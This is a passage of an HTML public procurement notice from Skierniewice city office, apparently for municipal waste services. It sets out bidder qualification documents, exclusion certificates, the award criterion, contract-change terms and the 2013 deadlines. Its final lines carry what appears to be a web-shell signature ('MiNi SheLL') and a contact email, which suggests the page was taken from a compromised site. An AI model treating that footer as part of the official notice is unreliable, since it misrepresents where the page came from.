Na dowód tego wykonawca do oferty winin załączyć: Wykaz narzędzi i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia, wg  wzoru określonego w załączniku nr 6 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek o którym mowa w art. 22 ust.1 pkt 3 ustawy pzp dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykonawca złoży oświadczenie załącznik nr 3 SIWZ. Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę. 
Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku sytuacji ekonomicznej i finansowej Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w związku z prowadzoną działalnością gospodarczą na kwotę minimum 1.000.000,00 zł (słownie: jeden milion złotych i 00/100).

Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić  dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić  inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez  Zamawiającego  warunku.
Na dowód tego wykonawca do oferty winien załączyć: Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 1.000.000,00.zł
(słownie: jeden milion złotych i 00/100).
Wykonawca zobowiązuje się utrzymać ubezpieczenie przez cały okres obowiązywania umowy. 

Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty  (załącznik nr 1)  do SIWZ 
2. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 Ustawy Pzp, sporządzone według wzoru (załącznik nr 3) do SIWZ.
3. Wykaz narzędzi i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia, wg  wzoru określonego w załączniku nr 6 do SIWZ.
4. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich masy, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie  w sposób ciągły przez okres minimum 12 miesięcy  o masie łącznej minimum 12.000,00 Mg rocznie, zgodnie z treścią załącznika nr 5 do SIWZ. Wykaz musi potwierdzać spełnianie warunku, o którym mowa w punkcie 7.2.2 SIWZ.
5. Oświadczenie o braku podstaw do wykluczenia, sporządzone według wzoru 	(załącznik nr 4) do SIWZ,
6. 	Dowód wniesienia wadium - potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagania dotyczące wadium zawarte zostały w pkt. 10 SIWZ.
7. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia  publicznego, o którym mowa w art. 23 ustawy Pzp.
8.  Informacja o przynależności do grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 ustawy Pzp wraz z listą podmiotów należących  do tej samej grupy kapitałowej, lub informację  o tym, że  nie należy do grupy kapitałowej - wg. wzoru stanowiącego załącznik Nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy:
1. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
2. Zamawiający nie przewiduje możliwości zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że konieczność takich zmian wynika z wystąpienia następujących okoliczności:
2.1. zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ     na realizację przedmiotu Umowy,
2.2. zmiany terminu wykonania przedmiotu umowy przy zaistnieniu zdarzeń o charakterze siły wyższej, niezależnych od Stron Umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu Umowy. 
2.3. zmiany terminu wykonania przedmiotu umowy spowodowane działaniem organów administracji, w szczególności: odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień bądź wydania decyzji, zezwoleń, uzgodnień po ustawowym terminie,
2.4. wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeśli zmiany te są korzystne dla Zamawiającego,
2.5. zmiany ilości (zwiększenie lub zmniejszenie) mieszkańców  miasta Skierniewice       do 2%  nie powodują zmian w opłatach za gospodarowanie odpadami,
2.6.  z powodu działań osób trzecich uniemożliwiających wykonanie prac , które               to działania nie są konsekwencją winy którejkolwiek ze stron.
3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice,
ul. Rynek 1,
96-100 Skierniewice,
Wydział Gospodarki Komunalnej i Ochrony Środowiska, ul. Senatorska 12, pokój 120.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2013 godzina 10:00, miejsce: Urząd Miasta Skierniewice,
ul. Rynek 1,
96-100 Skierniewice,
sekretariat pokój nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com